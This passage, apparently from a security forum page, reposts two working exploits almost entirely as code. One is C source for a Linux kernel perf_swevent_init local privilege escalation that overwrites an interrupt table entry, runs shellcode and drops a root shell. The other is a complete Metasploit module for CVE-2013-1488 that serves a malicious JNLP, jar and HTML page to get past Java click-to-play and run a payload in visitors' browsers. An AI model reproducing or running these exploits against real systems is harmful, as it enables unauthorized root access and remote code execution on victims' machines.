sc_replace(uint8_t *sc, uint32_t needle, uint32_t val) { void *p; p = memmem(sc, 900, &needle, sizeof(needle)); if (!p) errx(1, "can't find %x", needle); memcpy(p, &val, sizeof(val)); } static void *map_mem(uint64_t addr) { void *p; p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); if (p == MAP_FAILED) err(1, "mmap()"); return p; } static int find_mem(void *mem, uint8_t c) { int i; uint8_t *p = mem; for (i = 0; i < SIZE; i++) { if (p[i] == c) return i; } return -1; } static void dropshell() { if (setuid(0) != 0) errx(1, "failed"); printf("Launching shell\n"); execl("/bin/sh", "sh", NULL); exit(0); } void morte(int x) { printf("Got signal\n"); close(_fd); dropshell(); } static void trigger(int intr) { switch (intr) { case 0: do { int z = 1; int a = 1; z--; a /= z; } while (0); break; case 4: asm("int $4"); break; case 0x80: asm("int $0x80"); break; default: errx(1, "unknown intr %d", intr); } sleep(3); } int main(int argc, char *argv[]) { uint32_t *p[2]; int fd, i; uint64_t off; uint64_t addr = BASE; struct idt idt; uint8_t *kbase; int sz = 4; int intr = 4; printf("Searchin...\n"); p[0] = map_mem(BASE); p[1] = map_mem(BASE_JUMP); memset(p[1], 0x69, SIZE); off = 0xFFFFFFFFL; fd = perf_open(off); close(fd); i = find_mem(p[0], 0xff); if (i == -1) { i = find_mem(p[1], 0x68); if (i == -1) errx(1, "Can't find overwrite"); sz = 24; addr = BASE_JUMP; printf("detected CONFIG_JUMP_LABEL\n"); } munmap(p[0], SIZE); munmap(p[1], SIZE); addr += i; addr -= off * sz; printf("perf_swevent_enabled is at 0x%lx\n", addr); asm("sidt %0" : "=m" (idt)); printf("IDT at 0x%lx\n", idt.addr); off = addr - idt.addr; off -= 8; switch (off % sz) { case 0: intr = 0; break; case 8: intr = 0x80; break; case 16: intr = 4; break; default: errx(1, "remainder %d", off % sz); } printf("Using interrupt %d\n", intr); off -= 16 * intr; assert((off % sz) == 0); off /= sz; off = -off; // printf("Offset %lx\n", off); kbase = (uint8_t*) (idt.addr & 0xFF000000); printf("Shellcode at %p\n", kbase); if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED) err(1, "mmap()"); memset(kbase, 0x90, KSIZE); kbase += KSIZE - 1024; i = __sc_next - __sc_start; memcpy(kbase, __sc_start, i); kbase += i; memcpy(kbase, sc, 900); sc_replace(kbase, TMP(1), getuid()); sc_replace(kbase, TMP(2), getgid()); signal(SIGALRM, morte); alarm(2); printf("Triggering sploit\n"); _fd = perf_open(off); trigger(intr); exit(0); } Sursa: Linux kernel perf_swevent_init - Local root Exploit
  25. Nytro
    [h=1]Java Applet Driver Manager Privileged toString() Remote Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution', 'Description' => %q{ This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes, from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Vulnerability discovery and Analysis 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-1488' ], [ 'OSVDB', '91472' ], [ 'BID', '58504' ], [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 10 2013' )) end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class") @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class") @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object") @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver") @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name) @jnlp_name = rand_text_alpha(8) super end def jnlp_file jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" jnlp = %Q| <?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}"> <information> <title>Applet Test JNLP</title> <vendor>#{rand_text_alpha(8)}</vendor> <description>#{rand_text_alpha(8)}</description> <offline-allowed/> </information> <resources> <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" /> <jar href="#{rand_text_alpha(8)}.jar" main="true" /> </resources> <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1"> <param name="__applet_ssv_validated" value="true"></param> </applet-desc> <update check="background"/> </jnlp> | return jnlp end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jnlp$/i send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" }) when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("FakeDriver.class", @driver_class) jar.add_file("FakeDriver2.class", @driver2_class) jar.add_file("META-INF/services/java.lang.Object", @object_services) jar.add_file("META-INF/services/java.sql.Driver", @driver_services) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp" # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass html = %Q| <html> <body> <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0> <param name="app" value="#{jnlp_uri}"> <param name="back" value="true"> <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </object> </body> </html> | return html end end Sursa: Java Applet Driver Manager Privileged toString() Remote Code Execution
×
×
  • Create New...